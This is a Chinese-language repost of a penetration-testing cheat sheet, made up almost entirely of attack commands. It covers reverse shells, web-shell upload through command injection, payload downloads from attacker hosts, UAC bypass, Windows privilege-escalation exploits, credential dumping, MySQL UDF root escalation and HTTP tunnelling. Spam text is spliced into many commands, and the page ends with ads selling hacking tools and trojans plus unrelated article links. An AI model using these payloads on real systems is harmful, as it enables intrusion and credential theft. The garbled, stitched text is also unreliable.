$ chown -R tempuser:tempuser /home/tempuser/.ssh

# 反弹 ssh shell

$ wget -O - -q "http://domain.tk/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"

利黑客论坛qq群用 POST 远程命令执行获取 Shell

attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Bwhoami&submit=submit' 'http://victum.tk/command.php'

attacker:~$ curl -i -s -k -X 'POST' --data-binary $'IP=%3Becho+%27%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3B+%3F%3E%27+%3E+..%2Fshell.php&submit=submit' 'http://victum.tk/command.php'

attacker:~$ 黑客论坛qq群 curl http://victum.tk/shell.php?cmd=id

# 在服务器上下载 shell (phpshell.php)

http://victum.tk/shell.php?cmd=php%20-r%20%27file_put_contents%28%22phpshell.php%22,%20fopen%28%22http://attacker.tk/phpshell.txt%22,%20%27r%27%29%29;%27

# 运行 nc 并执行 phpshell.php

attacker:~$ nc -nvlp 1337

以管理员身份在 Win7 上反弹具有系统权限的 Shell

msfvenom 黑客论坛qq群 –p windows/shell_reverse_tcp LHOST=192.168.56.102 –f exe > danger.exe

# 显示账户配置

net user <login>

# Kali 上下载 psexec

https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx

# 使用 powershell 脚本上传 psexec.exe 到目标机器

echo $client = New-Object System.Net.WebClient > script.ps1

echo 黑客论坛qq群 $targetlocation = "http://192.168.56.102/PsExec.exe" >> script.ps1

echo $client.DownloadFile($targetlocation,"psexec.exe") >> script.ps1

powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script.ps1

# 使用 powershell 脚本上传 danger.exe 到目标机器

echo $client = New-Object System.Net.WebClient &黑客论坛qq群gt; script2.ps1

echo $targetlocation = "http://192.168.56.102/danger.exe" >> script2.ps1

echo $client.DownloadFile($targetlocation,"danger.exe") >> script2.ps1

powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script2.ps1

# 使用预编译的二进制文件绕过 UAC:

https://github.com/hfiref0x/UACME

黑客论坛qq群

# 使用 powershell 脚本上传 https://github.com/hfiref0x/UACME/blob/master/Compiled/Akagi64.exe 到目标机器

echo $client = New-Object System.Net.WebClient > script2.ps1

echo $targetlocation = "http://192.168.56.102/Akagi64.exe" >> script3.ps1

echo $client.DownloadFile($targetlocation,"Akagi64.exe") >> 黑客论坛qq群 script3.ps1

powershell.exe -ExecutionPolicy Bypass -NonInteractive -File script3.ps1

# 在 Kali 上创建监听

nc -lvp 4444

# 以系统权限使用 Akagi64 运行 danger.exe

Akagi64.exe 1 C:\Users\User\Desktop\danger.exe

# 在 Kali 上创建监听

nc -lvp 4444

# 下一步就会反弹给我们一个提过权的 shell

# 以系统权限使用 PsExec 运行 danger.exe

psexec.exe –黑客论坛qq群i –d –accepteula –s danger.exe

以普通用户身份在 Win7 上反弹具有系统权限的 Shell

https://technet.microsoft.com/en-us/security/bulletin/dn602597.aspx #ms15-051

https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html

https://www.exploit-db.com/exploits/37049/

# 查找目标机器是否安装了补丁,输入如下命令

wmic qfe 黑客论坛qq群 get

wmic qfe | find "3057191"

# 上传编译后的利用程序并运行它

https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe

# 默认情况下其会以系统权限执行 cmd.exe,但我们需要改变源代码以运行我们上传的 danger.exe

# https://github.com/hfiref0x/CVE-2015-1701 下载它并定位到 "main.c"

# 使用 wce.exe 黑客论坛qq群 获取已登录用户的明文账号密码

http://www.ampliasecurity.com/research/windows-credentials-editor/

wce -w

# 使用 pwdump7 获取其他用户的密码哈希值

http://www.heise.de/download/pwdump.html

# we can try online hash cracking tools such crackstation.net

MS08-067 – 不使用 Metasploit

$ nmap -v -p 139, 445 --script= *** b-check-vulns --script-args=unsafe=1 192.168.31.205

$ 黑客论坛qq群 searchsploit ms08-067

$ python /usr/share/exploitdb/platforms/windows/remote/7132.py 192.168.31.205 1

通过 MySQL Root 账户实现提权

# Mysql Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

$ wget 0xdeadbeef.info/exploits/raptor_udf2.c

$ gcc -g -c raptor_udf2.c

$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o 黑客论坛qq群 -lc

mysql -u root -p

mysql> use mysql;

mysql> create table foo(line blob);

mysql> insert into foo values(load_file('/home/user/raptor_udf2.so'));

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';

mysql> create function do_system returns integer soname 'raptor_udf2.so';黑客论坛qq群

mysql> select * from mysql.func;

mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown user:user /tmp/out');

user:~$ su -

Password:

user:~# whoami

root

root:~# id

uid=0(root) gid=0(root) groups=0(root)

使用 LD_PRELOAD 注入程序

$ wget 黑客论坛qq群 https://github.com/jivoi/pentest/ldpreload_shell.c

$ gcc -shared -fPIC ldpreload_shell.c -o ldpreload_shell.so

$ sudo -u user LD_PRELOAD=/tmp/ldpreload_shell.so /usr/local/bin/somesoft

针对 OpenSSH 用户进行枚举时序攻击

注:枚举时序攻击(“Enumeration Timing Attack”)属于侧信道攻击/旁路攻击(Side Channel Attack),侧信道攻击是指利用信道外的信息,比如加解密的速度/加解密时芯片引脚的电压/密文传输的流量和途径等进行攻击的方式,一个词形容就黑客论坛qq群是“旁敲侧击”。–参考自 shotgun 在知乎上的解释。

osueta 是一个用于对 OpenSSH 进行时序攻击的 python2 脚本,其可以利用时序攻击枚举 OpenSSH 用户名,并在一定条件下可以对 OpenSSH 服务器进行 DOS 攻击。

# https://github.com/c0r3dump3d/osueta

$ ./osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes

$ ./osueta.py -H 192.168.10.22 -p 22 -d 15 -v yes –dos no -L userfile.txt

使用 黑客论坛qq群 ReDuh 构造合法的 HTTP 请求以建立 TCP 通道

注: ReDuh 是一个通过 HTTP 协议建立隧道传输各种其他数据的工具。其可以把内网服务器的端口通过 http/https 隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

对了亲~ReDuh-Gui 号称端口转发神器哦。

# https://github.com/sensepost/reDuh

# 步骤 1

# 上传 reDuh.jsp 目标服务器

$ http://192.168.10.50/uploads/reDuh.jsp

# 步骤 2

# 在本机运行 reDuhClient 黑客论坛qq群

$ java -jar reDuhClient.jar http://192.168.10.50/uploads/reDuh.jsp

# 步骤 3

# 使用 nc 连接管理端口

$ nc -nvv 127.0.0.1 1010

# 步骤 4

# 使用隧道转发本地端口到远程目标端口

[createTunnel] 7777:172.16.0.4:3389

# 步骤 5

# 使用 RDP 连接远程

$ /usr/bin/rdesktop -g 1024x768 -P -z -x l -k en-us -r sound:off localhost:7777

黑客论坛qq群

*原文:jivoi

微信盗号是不可能的,除非你的密码他知道并且绑定的手机号在他手里问题是你微信号被盗了,以后。然后进什么群片,什么红包?你是怎么知道的?不要以为自己做了什么事情,然后可以就可以被盗号的借口。不要自作聪明,别人也。黑客代查手机号

修改黑彩余额教程骗子的常见套路之一就是许诺能完成不可能实现的要求,反过来你的要求也不尽合理,能够达到这样的要求,如果不是有特权。

黑客代查手机号我来助你一臂之力!你把不用的程序都关了,然后打开任务管理器,截一张所有进程的图,发上来我帮你看看~一般是读取系统中的sam文件,然后下载安装ohpcrack进行破解。Ophcrack是一个使用Rainbowtable(彩虹表)来破解视窗作业系统下的LANManager散列(比如。

。用的黑客软件多了..扫号的工具一般是T *** 和D *** ..肉鸡软件一般是灰鸽子和旁注软件.暴力破解一般是俄罗斯的一个软件..名字不能告诉你..怕你用来。

四、遗忘了Windows屏保密码,我们可以再开机后按F8键,选择安全模式启动,进入Window后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕保护,取消“密码。黑客代查手机号

本人因精力有限。出售黑客软件..学习教程。.抓肉鸡教程..软件。木马病毒。.游戏木马生成器。还有各种网吧破解..学习资料..编程语言教程。

黑客代查手机号。《黑客与画家:硅谷创业之父paulgraham文集》1为什么书呆子不受欢迎1他们的心思在别的地方。2黑客与画家18黑客也是创造者,与画家、建筑师、作家一样。3不。

相关文章

中国黑客五秒远程破解汽车(中国黑客五秒远程破解汽车是假的)

中国黑客五秒远程破解汽车(中国黑客五秒远程破解汽车是假的)

本文导读目录: 1、智能物联车越来越受欢迎,那么有一天黑客能不能远程开走你的汽车? 2、电影中黑客远程控制汽车真的可能么 3、智能车时代,黑客是否能通过网络入侵并控制智能化的汽车? 4、黑...

什么是国学(它的基本含义是什么)

什么是国学(它的基本含义是什么)

“国学”这个词产生于清末西学东渐、文化转型的历史时期。至于是谁的“原创”,到现在还没有一个确切的答案。有人说,章炳麟(章太炎)在日本组织“国学讲习会”,刘师陪(刘申叔)也有“国学保存会”的发起,大...

龙族理想:新用户免费领取5元微信红包!

腾讯旗下的手机游戏又最先免费送红包了,这次游戏叫“龙族理想”,新用户下载登录后即可免费领取5-200米微信红包,秒推送,天天限量5000份,游戏比较大,先到先得! 流动时间:2019年12月13...

黑客能找手机吗-黑客微信赚钱群(优惠券的微信群,他们怎么赚钱?)

黑客能找手机吗-黑客微信赚钱群(优惠券的微信群,他们怎么赚钱?)

黑客能找手机吗相关问题 模拟黑客网站名称相关问题 怎么查到黑客如今 取保候审不让登录微信(取保候审和羁押) 12...

手机没电了怎么办,学会这个技巧就不怕没有电

手机没电了怎么办,学会这个技巧就不怕没有电

相信大家外出的时候都很怕手机没电关机吧,这样可就遭大罪了是吧。微信支付,支付宝支付。当然,还有路痴常备的地图软件啦。然后还有可能接收不了重要的来电呐,短信呐,微信消息等等之类的,毕竟有时候找人找不到可...

耐克运动内衣怎么样

越来越多的人开始从事健身运动,女生也不例外,为了夏天能够秀出好身材,走进健身房挥洒汗水吧。但是许多刚开始健身的女生不知道该如何选择运动内衣,小编给各位指条明路,选耐克不就完事了。...